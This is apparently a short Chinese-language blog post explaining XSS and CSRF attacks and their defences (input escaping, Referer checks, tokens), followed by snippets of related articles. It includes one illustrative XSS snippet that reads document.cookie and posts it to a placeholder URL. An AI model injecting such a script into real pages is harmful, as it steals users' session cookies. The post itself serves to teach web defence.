网页安全XSS攻击和CSRF攻击

最新推荐文章于 2024-01-18 14:47:26 发布
最新推荐文章于 2024-01-18 14:47:26 发布
阅读量194 收藏
点赞数
分类专栏: javascript前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cctvcqupt/article/details/118569281
版权

1、XSS攻击(跨站脚本攻击)

通过各种手段,往网页上插入一些非法脚本,获取用户信息

比如 通过form表单,输入

<script>
    let cookie = document.cookie
    post(url,cookie)
</script>

解决方法:服务端对于输入内容的特殊字符要进行转意

2、CSRF攻击 (跨站请求伪造)

https://blog.csdn.net/stpeace/article/details/53512283 

不需要获取用户的cookie等信息,只需要在恶意网站上,模拟请求正常网站的API , 进行恶意删改数据,浏览器会自动带上正常网站的cookie,但这请求是用户不知道的,一切都显得那么合法。

解决办法:
1、后端通过http Referrer 判断客户端请求来源于何处,进行过滤;
2、在url或者请求头中加入token,后端对token进行验证

布里渊区
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS和CSRF两种攻击方式
weixin_43183219的博客
05-11 1580
什么是xss攻击,三种xss攻击方式详解,如何防御xss攻击,什么是CSRF攻击CSRF攻击的原理、特点以及xss和CSRF的区别
XSS 和 CSRF 攻击
gxll499294075的博客
03-21 204
一、XSS 1.1 XSS概念 XSS(Cross Site Scripting):跨域脚本攻击。 1.2 XSS攻击原理 XSS攻击的核心原理是:不需要你做任何的登录认证,它会通过合法的操作(比如在url中输入、在评论框中输入),向你的页面注入脚本(可能是js、hmtl代码块等)。 最后导致的结果可能是: 盗用Cookie破坏页面的正常结构,插入广告等恶意内容D-doss攻击 1.3 XSS攻击方式 1.3.1 反射型 发出请求时,XSS代码出现在u...
CSRF攻击XSS攻击
hu_lanlan的博客
10-16 629
CSRF(Cross-site request forgery):跨站请求伪造攻击者盗用了用户的身份,以用户的名义发送恶意请求,包括:以用户的名义发送邮件,发消息,盗取用户账号。防止措施:(1)检查报文中的Referer参数,确保请求发送自正确的网站。(2)对于任何重复的请求,都需要重新验证用户的身份。(3)创建一个唯一的令牌(Token),将其存在服务端的session中以及客户端的cookie中
安全问题 :CSRFXSS攻击
Annifan6666的博客
12-11 2870
CSRF(Cross-site request forgery):跨站请求伪造。 方法一、Token 验证:(用的最多) 服务器发送给客户端一个token; 客户端提交的表单中带着这个token。 如果这个 token 不合法,那么服务器拒绝这个请求。 方法二:隐藏令牌: 把 token 隐藏在 http 的 head头中。 方法二和方法一有点像,本质上没有太大区别,只是使用方式上有区别。 方法三、Referer 验证: Referer 指的是页面请求来源。意思是
XSS攻击CSRF攻击
XinKun的博客
06-01 910
XSS攻击 Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全。 XSS 常见的注入方法: 在 HTML 中内嵌的文本中,恶意内容以 script 标签形成注入。 在内联的 JavaScript 中,拼接的数据突破了原本的限制(字符串,变量,方法名等)。 在标签属性中,恶意内容包含引号,从而突破属性值
总结XSS与CSRF两种跨站攻击
和上帝躲猫猫
09-23 737
XSS:跨站脚本(Cross-site scripting CSRF:跨站请求伪造(Cross-site request forgery)   在那个年代,大家一般用拼接字符串的方式来构造动态SQL 语句创建应用,于是SQL 注入成了很流行的攻击方式。在这个年代,参数化查询已经成了普及用法,我们已经离SQL 注入很远了。但是,历史同样悠久的XSS 和CSRF 却没有远离我们。由于
CSRFXSS攻击与防御
Meiko记录
11-22 227
 CSRF概念:CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解:        攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。 如下:其中Web A为...
Yii框架防止sql注入,xss攻击csrf攻击的方法
10-21
在Yii框架中,防止SQL注入、XSS攻击CSRF攻击是保障Web应用安全的重要环节。接下来将详细说明Yii框架在这些方面的防范策略和措施。 首先,对于SQL注入的防护,Yii框架通过多种手段来确保数据的安全性。例如,可以...
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
Java Web应用安全防护:抵御CSRFXSS攻击的策略
最新发布
08-28
CSRFXSS攻击是Web应用开发中必须面对的安全挑战。通过本文的详细介绍,你应该能够理解这些攻击的原理和防护策略。在Java Web应用开发中,实施有效的CSRF和XSS防护措施是确保用户数据安全和应用稳定性的关键。随着...
XSS 和 CSRF 攻击详解
bdfcfff77fa的博客
01-18 1161
在 Web 安全领域中,XSS 和 CSRF 是最常见的攻击方式。跨站脚本攻击攻击者脚本嵌入被攻击网站,获取用户cookie等隐私信息。跨站请求伪造。已登录用户访问攻击者网站,攻击网站向被攻击网站发起恶意请求(利用浏览器会自动携带cookie)。
XSS、CSRF攻击
书中自有妍如玉的博客
08-12 874
双重验证Cookie:利用攻击者只能利用Cookie,不能获取Cookie的特点,用户访问页面时,服务器向请求域名添加一个Cookie随机字符串,然后,用户再次请求时从Cookie中取出这个字符串,添加到URL参数中,然后服务器通过对Cookie中的数据和参数中的数据对比验证,不一样就拒绝请求。存储型:是在有发贴评论等带有数据保存功能的网站的input、textarea将恶意代码提交到网站数据库中,如 ,然后比如在显示评论的页面就会从数据获取,并直接执行这个script标签里的恶意代码。...
CSRF攻击XSS攻击
Nie_XiaoGang的博客
04-13 311
CSRF攻击 什么是CSRF攻击 跨站请求伪造,盗用他人的登录信息发送请求。要实现CSFR攻击需要满足以下条件: 用户登录目标站点,处于登录状态,用户身份验证信息都存储在cookie中,此时访问危险站点就有被攻击的风险 用户的登录的身份验证信息存储在cookie中,黑客就可以在不知道验证信息的情况下盗用用户的cookie完成身份验证。 防护方法: 服务器做接口校验,用户登录后服务器返回一个token给客户端,客户端每次请求时将token放入请求头中提交给服务器校验。 XSS攻击 什么时XSS攻击 跨站脚本攻
【前端安全】一、CSRF攻击XSS攻击
weixin_39307273的博客
03-06 1558
1、CSRF CSRF,全称Cross-site request forgery(跨站请求伪造),其原理是利用用户的身份,执行非用户本身意愿的操作(隐式身份验证机制)。 形式:图片URL、超链接、Form提交等,也可以嵌入到第三方论坛、文章中等地方。 危害:攻击者可以盗用用户的身份,以用户的名义进行恶意操作,包括但不限于以用户的名义发送邮件、资金转账、网上等危害用户的操作 原理: ...
前端的CSRF攻击XSS攻击
Alive_tree的博客
08-07 432
1、什么是CSRF攻击 CSRF即Cross-site request forgery(跨站请求伪造),是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。 假如黑客在自己的站点上放置了其他网站的外链,例如"www.weibo.com/api ,默认情况下,浏览器会带着weibo.com的cookie访问这个网址,如果用户已登录过该网站且网站没有对CSRF攻击进行防御,那么服务器就会认为是用户本人在调用此接口并执行相关操作,致使账号被劫持。 2、如何防御CSRF攻击 1、验证Tok.
csrf攻击和xss(万恶之源)
liangkaihuaen的博客
08-05 167
1.可视化图直观 如图所示,用户首先要登录网站,然后网站生成一个cookie,下发给用户。用户禁不住诱惑,访问b网站,然后点击了不该点击的。那么用户就不经意之间进入了a网站。网站通过这种方法,调用bug接口,实现侵犯正义。(添加token认证即可) xss :比如用户在输入框中输入一段script标签,进而实现侵犯。就是类似于这种方法。 解决放法:转义标签就可以。 ...
web安全(xss及csrf
差不少的博客
07-13 1006
web安全防御: xss : 把一些数据直接拿来用,比如url,input中输入了一些东西,请求的资源等等一些用户能自定义的一些东西 比如:在input中输入一些标签(script标签),没进行过滤或转义(转义是把它们转成实体字符) 实体字符: < 小于符号的实体字符,在页面中替换成<。 https://blog.csdn.net/weixin_49007365/article/details/118583523 注:最新 消毒api html Sanitizer API 10月18号,
Web XSS和CSRF攻击原理浅谈
hopefullman的博客
02-20 721
作为一个即将放弃web开发的android来讲...对于朋友的疑问还是要给出解答... 本人也是参考了很多例子,总结一下感受,写出来便于大家理解。至于出处也请谅解。 跨站脚本攻击(Cross Site Script 为了区别于CSS 简称为 XSS)指的是恶意攻击者往Web页面里插入恶意js代码,当用户浏览该页之时,嵌入Web的代码会被执行,从而达到特殊目的。 因为我们完全信任了用户输入,...
sql注入 xss攻击csrf攻击的区别
06-13
SQL注入、XSS(跨站脚本攻击)和CSRF(跨站请求伪造)是三种常见的网络安全威胁,它们针对的应用场景和攻击机制有所不同。 1. SQL注入: - **定义**:攻击者通过在输入字段中插入恶意SQL代码,欺骗应用程序执行非...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值